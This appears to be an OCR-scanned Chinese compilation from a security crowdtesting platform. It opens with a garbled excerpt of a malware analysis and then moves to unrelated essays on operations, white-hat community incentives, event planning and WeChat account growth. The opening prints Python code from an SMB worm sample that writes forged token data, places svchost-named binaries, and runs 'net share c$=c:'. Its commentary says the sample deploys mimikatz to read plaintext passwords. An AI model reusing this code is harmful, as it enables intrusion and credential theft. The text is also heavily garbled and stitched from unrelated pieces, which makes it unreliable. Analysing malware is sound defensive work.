conn, info, userAnd r, to a[userAndGroupsOffset:userAndGroupsOffset + len(fakeUserAndGroups)1) 
fakeUserAndGroupCount ! с 
write.data(conn, info, tokenAdd iserAndGroupCountOffset, pack('«1', userAndGroupCount)) 


write data(conn, info, secCtxAddr, secCtxDatc 
conn.disconnect, tree(conn.get tid()) 
conn. logoff O) 
conn.get_socket().close() 
time. sleep(2) 
return True 


' smb. pwn(conn, arch, tg): 

ее = '' 

eb = ‘c:\\windows\\system32\\calc.exe' 

smbConn = conn.get_smbconnection() 

if os.path.exists('c:/windows/system32/svhost.exe'): 
ер = 'c:\\windows\\system32\\svhost.exe' 

if os.path.exists('c:/windows/SysWOW64/svhost.exe'): 
eb = 'c:\\windows\\SysWOW64\\svhost.exe' 

if os.path.exists(' c:/windows/system32/drivers/svchost.exe'): 
ер = 'c:\\windows\\system32\\drivers\\svchost. exe’ 

if os.path.exists('c:/windows/SysWOW64/drivers/svchost.exe'): 
eb = 'c:\\windows\\SysWOW64\\drivers\\svchost. exe’ 

service exec(conn, 'cmd /c net share c$=c:') 


当然 回 到 最 开始 ， 在 while 的 无 限 循环 之 前 有 执行 mmka 函数 ， 这 个 函数 的 作用 ， 调 用 minikatz 的 
ps 脚本 执行 读 取 本 地 明文 密码 。 








0x03 小 结 


这 部 分 py 样本 主要 是 针对 445 进 行 攻击 ， 包 括 创建 计划 任务 ， 上 传 minikatz， 开 启 共享 等 ， 这 个 是 个 
驱动 人 生 的 样本 。 


v.beahh.com 3 情报 判定 Ө 


be 
Bei 

ASIP SS i € Бн @ iau 2 6 09 2 ES FEET] 

D ғана t paang бу шини БЛ weiss Та : 
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第 十 五 章 运营 
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如 何 将 金字 塔 原理 在 运营 中 应 用 | 
什么 是 金字 塔 原理 ? 


金字 塔 原理 就 是 ， 任 何事 情 都 可 以 归纳 出 一 个 中 心 论点 ， 而 此 中 心 论点 可 由 三 至 七 个 论据 支持 ， 这 
些 一 级 论据 本 身 也 可 以 是 个 论点 ， 被 二 级 的 三 至 七 个 论据 支持 ， 如 此 延伸 ， 状 如 金字 塔 。 而 中 间 的 
从 上 至 下 ， 还 是 自 下 到 上 ， 都 是 一 个 分 析 问题 和 解决 问题 的 过 程 。 它 主要 帮助 我 们 在 思考 做 事情 的 
时 候 ， 逻 辑 清晰 、 层 次 分 明 ， 以 及 在 沟通 方式 上 ， 做 到 观点 鲜明 、 重 点 突出 、 简 单 易 懂 ， 让 受众 有 
兴趣 ， 能 理解 ， 记 得 住 。 总 之 就 一 个 词 : 逻辑 


将 金字 塔 原理 在 运营 中 的 运用 


什么 是 白 帽 运营， 在 我 的 理解 下 ， 就 是 运营 我 们 这 个 平台 的 用 户 ， 那 既然 是 用 户 ， 就 可 以 用 一 些 用 
户 运 营 的 思路 去 思考 怎么 去 运营 白 帽 。 比 如 ， 在 增加 白 帽 的 新 白 巾 的 数量 与 质量 的 同时 ， 也 要 增加 
老 白 帽 的 粘度 与 活跃 度 ， 那 这 个 时 候 ， 就 一 套 系统 来 支撑 。 


ШЕ УАШ 

激励 系统 
建立 激励 系统 定义 激励 和 ЕЕ 
的 目标 25 Alas BTA 


增加 白 幅 数量 物质 奖励 TSUEX 发 现 


积分 排行 


提升 白 幅 质 量 X іш 报名 
і 32595 ARX = 
23 ж.ш а E Amis 
的 数量 its 
提高 提交 漏 
洞 的 


1、 建立 激励 体系 的 目标 


当 你 有 了 一 个 完整 的 目标 时 ， 不 论 是 拉 新 白 帽 还 是 提高 白 帽 的 活跃 度 ， 你 接 下 来 的 事项 将 会 开展 的 
更 加 顺利 一 些 。 


2、 定义 激励 和 奖励 


奖励 一 般 分 为 物质 奖励 和 精神 奖励 ， 物 质 奖励 就 是 在 节假日 或 者 活动 的 时 候 给 一 些 白 帽 送 一 些 我 们 
平台 的 周边 ， 可 以 适当 的 增加 白 帽 的 活跃 度 和 粘度 。 而 精神 奖励 ， 则 是 让 白 帽 通过 提交 漏洞 的 质量 
与 数量 来 获得 我 们 平台 的 积分 (目前 还 未 完善 ) 。 


3. 白 帽 期 望 行为 
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白 帽 从 朋友 那里 知道 了 我 们 这 个 平台 ， 然 后 就 去 找 注册 认证 我 们 平台 的 白 帽 ， 这 就 是 白 帼 子 推荐 。 
然后 发 现 有 项 目的 时 候 就 会 去 报名 参加 该 项 目 ， 挖 到 漏洞 之 后 就 提交 漏洞 。 逐 渐 的 ， 就 从 新 用 户 转 
化 为 老 用 户 ， 这 就 是 白 帽 促 活 和 留存 
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活动 心得 一 一 如 何 举办 一 场 沙龙 活动 


举办 一 场 活动 ， 需 要 很 多 方面 的 筹备 。 如 何 举办 一 场 成 功 的 沙龙 活动 ， 是 一 个 很 复杂 的 事情 。 接 下 
来 ， 让 我 这 个 活动 新 人 来 分 享 一 下 自己 的 一 些小 心得 。 


RE: 举办 一 场 活动 ， 首 先 最 需要 的 就 是 资金 ， 如 何 合理 的 安排 资金 ， 做 好 预算 ， 是 需要 精打细算 
的 。 


场地 : 任何 活动 最 不 可 或 缺 的 就 是 场地 ， 场 地 定 下 来 了 ， 一 切 后 续 的 准备 才 可 以 推进 。 选 场地 是 一 
个 很 繁琐 的 过 程 ， 需 要 不 断 地 确认 时 间 以 及 场地 ， 还 需要 " 货 比 三 家 "， 最 后 确认 出 一 家 最 适合 的 。 


WA: 观众 是 举办 活动 的 初衷 ， 吸 引 更 多 安全 白 帆 ， 网 罗 优 秀 人 才 ， 是 我 们 的 主 虽 ， 建 立 线 下 安全 
交流 ， 拉 近 我 们 与 白 幅 的 距离 ， 进 一 步 打 响 雷 神 众 测 知名 度 ， 吸 引 更 多 优秀 的 人 才 加 入 平台 ， 为 平 
台 开 放 做 好 充足 的 准备 。 举 办 一 个 活动 ， 需 要 做 好 观众 定位 ， 我 们 来 的 是 什么 类 型 的 观众 ， 他 们 所 
喜欢 的 是 什么 。 在 他 们 眼 里 ， 最 重要 的 是 什么 。 这 些 是 我 们 需要 去 考虑 的 。 


жы: 嘉宾 是 活动 不 可 或 缺 的 一 部 分 ， 在 沙龙 活动 初期 ， 还 没有 任何 名 气 的 时 候 ， 最 重要 的 便 是 嘉 
宾 了 。 很 多 安全 工作 者 ， 往 往 是 因为 那些 嘉宾 和 议题 来 的 。 杭 州 站 的 时 候 ， 就 有 很 多 安全 白 帽 从 外 
地 赶 来 参与 沙龙 活动 ， 为 的 不 是 活动 本 身 ， 而 是 嘉宾 和 议题 。 

时 间 轴 : 做 一 个 活动 安排 表 ， 详 细 到 几 号 之 前 该 完成 哪些 事 ， 哪 些 细节 需要 确认 ， 一 定 要 完全 列 出 
来 ， 防 止 自己 忘记 。 好 的 体验 : 沙龙 活动 要 想 长 久 地 举办 下 去 ,一定 要 给 观众 良好 的 活动 体验 。 
RITE: 一 个 活动 的 优秀 举办 ， 必 定 需要 较 大 的 曝光 率 。 即 使 是 不 曾 来 参加 的 安全 工作 者 ， 在 他 们 
脑海 里 留 下 该 活动 的 印象 ， 将 更 有 利于 下 次 活动 的 举办 。 

有 反思: 反思 是 每 一 个 活动 举办 者 所 应 该 做 的 ， 我 们 从 活动 中 获得 了 什么 ， 我 们 达到 了 我 们 预期 的 效 
果 了 么 ， 我 们 应 该 从 哪些 方面 去 改善 这 些 活 动 ， 提 升 活动 效果 。 

一 个 活动 的 举办 ， 每 一 个 环节 都 是 不 可 或 缺 的 。 我 们 需要 把 活动 流程 一 授 再 抒 ， 熟 悉 每 一 个 环节 ， 
确保 万 无 一 失 。 
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从 用 户 中 来 ， 到 用 户 中 去 


做 过 产品 运营 实习 生 ， 又 做 过 产品 经 理 助理 的 一 些 工 作 ， 那 么 就 先 来 说 说 我 所 理解 的 二 者 关系 
吧 。 就 最 终 目的 来 讲 ， 产 品 和 运营 大 体 是 相似 的 。 表 面 上 ， 产 品 面向 需求 ， 而 运营 面向 策略 ， 
但 归根 结 底 ， 两 者 面向 的 都 是 用 户 。 从 滴 滴 成 功 打 入 打车 市 场 再 到 淘宝 开创 了 网 购 的 时 代 ， 从 
支付 宝 开启 了 移动 支付 方式 再 到 携程 旅行 网 络 式 购 票 ， 这 些 无 不 体现 了 "消费 者 的 需求 是 一 切 商业 销 
售 的 核心 "。 因 此 ， 用 户 是 需求 之 源 ， 无 论 是 产品 还 是 运营 ， 都 要 拥有 以 用 户 为 中 心 的 思想 ， 不 断 体 
会 真正 的 用 户 ， 了 解 真正 的 需求 。 下 面 我 将 根据 在 工作 中 遇 到 的 问题 、 思 考 及 解决 方式 谈 谈 为 
什么 我 会 把 用 户 看 的 这 么 重要 。 需求 不 是 靠 " 拍 脑袋 "决定 的 。 相 反 ， 需 求 是 需要 向 用 户 采 集 
的 。 用 户 采 集 分 为 内 部 采集 和 外 部 采集 。 其 中 ， 内 部 采集 面向 自己 ， 包 括 数据 分 析 及 竞 品 分 析 
等 ; 外 部 采集 面向 用 户 ， 包 括 用 户 访谈 、 问 卷 调查 和 用 户 反馈 等 。 对 于 内 部 采集 ， 我 通过 亲身 
试用 和 雷神 众 测 同 类 型 的 九 个 国内 外 安全 众 测 平台 ， 梳 理 各 平台 的 操作 流程 ， 找 出 各 自满 足 用 户 的 
基本 需求 和 吸引 用 户 的 魅力 需求 ， 思 考 差 异 模块 设计 的 原因 ， 从 而 分 析 当 前 雷神 众 测 平台 的 优 缺 
点 ， 查 缺 补漏 。 对 于 外 部 采集 ， 我 通过 在 白 帽 群发 布 调查 问卷 ， 从 而 了 解 用 户 的 细节 想法 。 有 
趣 的 是 ， 通 过 调查 ， 在 内 部 采集 中 发 现 的 点 ， 也 会 有 用 户 提出 。 用 户 是 产品 的 参与 者 ， 产 品 终 
究 是 要 满足 用 户 需求 ， 但 这 并 不 等 于 用 户 说 什么 ， 我 就 需要 做 什么 。 用 户 的 需求 往往 是 站 在 自 
己 的 立场 上 考虑 的 。 比 如 雷神 众 测 的 老 平台 是 通过 手机 验证 码 登 录 的 ， 而 新 平台 则 是 采用 邮箱 、 微 
信 扫 码 或 支付 宝 扫 码 登 录 ， 即 使 前 期 通知 用 户 及 时 修改 邮箱 以 便 数 据 迁 移 ， 但 试用 当天 仍然 出 现 音 
分 用 户 未 更 换 邮 箱 导 致 无 法 登录 的 问题 ， 于 是 便 有 用 户 提出 是 否 可 以 采用 短信 报名 的 方式 。 这 里 更 
深层 次 的 需求 可 能 是 用 户 需要 增加 一 个 短信 登录 的 方式 以 及 通过 短信 的 一 些 项 目 提 示 ， 而 不 是 仅仅 
使 用 短信 进行 项 目 报名 。 从 上 面 例子 可 以 看 出 ， 产 品 的 需求 应 该 是 从 用 户 的 需求 出 发 ， 挖 掘 用 户 内 
心 的 根本 需求 。 用 户 提 出 了 那么 多 需求 ， 每 一 个 需求 都 统统 实现 是 不 现实 的 。 这 时 候 需 要 将 收 
集 到 的 用 户 需 求 罗 列 出 来 ， 对 需求 的 使 用 场景 、 描 述 及 原因 等 信息 进行 详细 的 说 明 ， 从 而 排列 出 需 
求 的 优先 级 ， 通 过 筛选 ， 留 下 性 价 比 高 的 需求 。 就 好 比 与 加 快 vpn 的 速度 相 比 不 使 用 vpn 就 能 直接 访 
问 雷 神 众 测 平台 更 加 方便 。 由 此 可 见 ， 无 论 对 于 产品 或 者 运营 来 说 用 户 的 需求 都 有 着 至 关 重 要 
的 地 位 ， 但 是 用 户 的 需求 又 不 是 产品 的 全 部 。 因 此 ， 如 何 更 好 的 完成 内 外 部 采集 ， 如 何 协调 好 用 户 
需求 以 及 产品 需求 之 间 的 关系 ， 并 合理 的 对 用 户 需求 筛选， 都 需要 我 们 进行 更 深入 的 学 习 和 探讨 。 
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文章 与 活动 之 间 的 关联 


ar 
Ші 


运营 最 重要 的 就 是 要 把 产品 ， 项 目 最 好 的 一 面 展 示 给 客户 以 及 受众 人 群 ， 所 以 掌管 公众 号 的 运营 就 
更 加 要 了 解 客户 想 要 看 到 的 是 什么 ， 受 众人 群 喜欢 看 什么 ， 如 何 将 技术 性 的 文章 推广 到 大 家 面前 。 


公众 号 吸引 粉丝 
曾经 总 结 过 有 关于 公众 号 如 何 吸引 更 多 粉丝 的 方法 ， 分 析 了 雷神 众 测 公众 号 从 刚 开始 到 现在 所 发 
的 文章 ， 总 结 了 每 天 发 的 文章 吸引 的 粉丝 情况 。 


在 节 
奏 相 对 较 快 的 今天 ， 如 果 你 的 标题 和 封面 抓 不 住人 的 眼球 ， 那 基本 上 浏览 到 这 篇 文章 的 人 是 不 会 点 
e 


论 高 级 IX 防 团队 
建设 方法 论 之 


fet REE SP 


— M 





进去 的 。 E: MAS 
个 能 抓 住人 眼球 的 封面 是 首要 的 ， 但 是 仅仅 是 浏览 文章 也 不 一 定 会 留 住 观 看 的 人 。 如 果 满 篇 都 是 枯 
燥 的 技术 性 理论 ， 那 么 对 专业 知识 不 太 了 解 的 人 就 会 觉得 很 枯燥 ， 枯 燥 就 会 让 他 们 关 掉 这 篇 文章 。 


https//n t/log4j/log4j 


引 不 管 是 了 解 相关 的 专业 人 员 ， 还 是 与 不 太 了 解 技术 相关 但 是 觉得 对 自己 日 常 有 帮助 的 人 。 那 么 我 
们 的 文章 就 需要 在 讲解 专业 知识 的 同时 ， 也 能 够 用 通俗 的 话语 解释 一 下 具体 的 细节 ， 让 更 多 的 人 能 
够 听 懂 。 
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аор GAs 

1 什么 是 切面 ? 

2 什么 是 切入 点 ? 
BATA BIG E 
4. 什 么 是 通知 ? 

5. 切 入 的 方式 ? 
6. 什 么 是 织 入 ? 





方法 执行 流程 


同时 
我 们 还 下 有 时 会 发 布 一 些 能 够 让 大 多 数 人 看 得 懂 用 得 上 的 小 技巧 的 介 + 绍 。 


如 果 不 记得 文件 的 有 具体 名 字 或 者 坦 搜 索 一 系列 的 文件 ， 还 可 以 使 用 正则 表达 式 搜索 文件 


кс 
Q contig pho " vA 
Q ser) tona php 4 m" 
@ oven dotem php A 
LIU A config php Ё ^ 
@ contig рер aj a 
5 ento php ! 
W conf php ae 
contig php $ T 
@ confie php í 364» 
PIS < 
@. o config php 
ç. config. php 
Wo contq php " 
[m 
8» coh php 
Qs з собр php 





总 结 结 下 来 一 Ба 
能 够 吸引 人 的 文章 首先 要 能 通过 封面 吸引 大 家 ， 然 后 告诉 大 家 我 们 这 第 文章 主要 讲 的 是 什么 ， 这样 

会 让 有 需求 的 人 点 进来 看 ， 并 且 内 容 上 要 能 够 让 大 家 理解 这 是 什么 。 并 且 需 要 一 些小 技巧 的 文章 
来 吸引 更 多 的 人 。 


举办 活动 增加 热度 
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在 我 总 结 的 公众 号 涨 粉 数据 中 ， 有 一 部 分 涨 粉 较 多 的 日 子 是 因为 我 们 举办 了 活动 ， 包 括 并 不 仅 限 
于 ，HACKINGDAY， 校 园 行 ， 公 众 号 转发 抽奖 等 。 以 《你 知道 你 身边 有 多 少 隐 藏 的 " 白 帽 “黑客 "大 
佬 好 友 吗 》 为 例 ， 这 是 我 们 举办 的 一 个 转发 抽奖 活动 ， 参 与 人 次 高 达 118 人 。 


阅读 
量 高 达 3752 人 次 ， 评 论 留 言 30 多 条 ， 并 且 带 动 朋 友 圈 转发 的 热度 ， 当 天 涨 粉 149 人 。 这 对 于 公众 号 
来 说 是 一 次 很 成 功 的 营销 ， 公 众 号 也 需要 这 样 的 热度 。 


2019-12-13 
新 关注 人 数 -全 部 149 


并 且 举 办 活动 可 以 通过 朋友 圈 的 扩散 ， 让 更 
多 人 知道 有 雷神 众 测 这 样 一 个 公众 号 ， 现 在 互联 网 的 发 展 是 酒 香 也 怕 埠 子 深 ， 所 以 通过 举办 活动 提 
升 知 名 度 ， 也 是 为 了 公众 号 更 好 的 发 展 。 


小 结 


运营 公众 号 不 仅 需 要 好 的 文章 持续 性 的 发 展 ， 也 需要 通过 举办 活动 来 增加 热度 ， 活 动 带 来 的 热度 能 
够 让 好 的 文章 被 更 多 人 看 到 ， 而 好 的 文章 也 能 留 住 那 些 被 活动 吸引 过 来 的 人 ， 二 者 缺 一 不 可 。 
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